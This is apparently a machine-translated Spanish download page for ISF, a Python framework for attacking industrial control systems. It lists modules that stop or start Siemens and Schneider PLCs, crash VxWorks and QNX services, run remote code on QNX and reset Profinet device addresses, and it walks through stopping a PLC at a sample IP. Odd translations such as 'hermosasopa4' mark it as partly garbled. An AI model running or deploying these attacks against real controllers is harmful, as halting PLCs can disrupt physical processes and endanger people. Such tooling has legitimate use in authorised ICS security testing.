Descarga isf - Descarga del código fuente isf

isf

Otro código fuente

ve release

Descargar

Marco de explotación industrial

ISF (Industrial Exploitation Framework) es un marco de explotación basado en Python, es similar al marco de metasploit.

ISF se basa en el proyecto de código abierto routersploit.

Lea esto en otros idiomas: inglés, 简体中文,

Descargo de responsabilidad

El uso de ISF para atacar objetivos sin previo consentimiento mutuo es ilegal. Es responsabilidad del usuario final obedecer todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables de ningún mal uso o daño causado por este programa.

Clientes del protocolo ICS

Nombre	Camino	Descripción
modbus_tcp_client	icssploit/clients/modbus_tcp_client.py	Cliente Modbus-TCP
wdb2_cliente	icssploit/clients/wdb2_client.py	Cliente WdbRPC versión 2 (Vxworks 6.x)
s7_cliente	icssploit/clients/s7_client.py	Cliente s7comm (PLC S7 300/400)

Módulo de explotación

Nombre	Camino	Descripción
s7_300_400_plc_control	exploits/plcs/siemens/s7_300_400_plc_control.py	Arranque/parada del PLC S7-300/400
s7_1200_plc_control	exploits/plcs/siemens/s7_1200_plc_control.py	Arranque/parada/reinicio del PLC S7-1200
vxworks_rpc_dos	exploits/plcs/vxworks/vxworks_rpc_dos.py	DOS remotos de Vxworks RPC (CVE-2015-7599)
control_cuántico_140_plc	exploits/plcs/schneider/quantum_140_plc_control.py	Arranque/parada del PLC Schneider Quantum serie 140
crash_qnx_inetd_tcp_service	exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py	Dos de servicio QNX Inetd TCP
qconn_remote_exec	exploits/plcs/qnx/qconn_remote_exec.py	Ejecución remota de código QNX qconn
profinet_set_ip	exploits/plcs/siemens/profinet_set_ip.py	Configuración IP del dispositivo Profinet DCP

Módulo de escáner

Nombre	Camino	Descripción
profinet_dcp_scan	escáneres/profinet_dcp_scan.py	Escáner Profinet DCP
vxworks_6_scan	escáneres/vxworks_6_scan.py	Escáner Vxworks 6.x
s7comm_scan	escáneres/s7comm_scan.py	Escáner S7com
enip_scan	escáneres/enip_scan.py	Escáner IP Ethernet

Módulo de Protocolos ICS (Módulo Scapy)

Estos protocolos se pueden utilizar en otros marcos de Fuzzing como Kitty o crear su propio cliente.

Nombre	Camino	Descripción
pn_dcp	icssploit/protocolos/pn_dcp	Protocolo Profinet DCP
modbus_tcp	icssploit/protocolos/modbus_tcp	Protocolo Modbus TCP
wdbrpc2	icssploit/protocolos/wdbrpc2	Protocolo WDB RPC versión 2
s7com	icssploit/protocols/s7comm.py	Protocolo S7comm

Instalar

Requisitos de Python

gnureadline (solo OSX)
solicitudes
paramiko
hermosasopa4
pysnmp
python-nmap
scapy Sugerimos instalar el manual de scapy con este documento oficial

Instalar en Kali

 git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

Uso

    root@kali:~/Desktop/temp/isf# python isf.py
    
      _____ _____  _____ _____ _____  _      ____ _____ _______
     |_   _/ ____|/ ____/ ____|  __ | |    / __ _   _|__   __|
       | || |    | (___| (___ | |__) | |   | |  | || |    | |
       | || |     ___ \___ |  ___/| |   | |  | || |    | |
      _| || |____ ____) |___) | |    | |___| |__| || |_   | |
     |__________|_____/_____/|_|    |__________/_____|  |_|
    
    
                    ICS Exploitation Framework
    
    Note     : ICSSPOLIT is fork from routersploit at
               https://github.com/reverse-shell/routersploit
    Dev Team : wenzhe zhu(dark-lbp)
    Version  : 0.1.0
    
    Exploits: 2 Scanners: 0 Creds: 13
    
    ICS Exploits:
        PLC: 2          ICS Switch: 0
        Software: 0
    
    isf >

Hazañas

 isf > use exploits/plcs/
exploits/plcs/siemens/  exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >

Puede utilizar la tecla de tabulación para completar.

Opciones

Opciones del módulo de visualización:

 isf (S7-300/400 PLC Control) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. 192.168.1.1
   port       102                  Target Port


Module options:

   Name        Current settings     Description
   ----        ----------------     -----------
   slot        2                    CPU slot number.
   command     1                    Command 0:start plc, 1:stop plc.


isf (S7-300/400 PLC Control) >

Establecer opciones

 isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}

Ejecutar módulo

 isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >

Mostrar información sobre exploit

 isf (S7-300/400 PLC Control) > show info

Name:
S7-300/400 PLC Control

Description:
Use S7comm command to start/stop plc.

Devices:
-  Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

Authors:
-  wenzhe zhu 

References:

isf (S7-300/400 PLC Control) >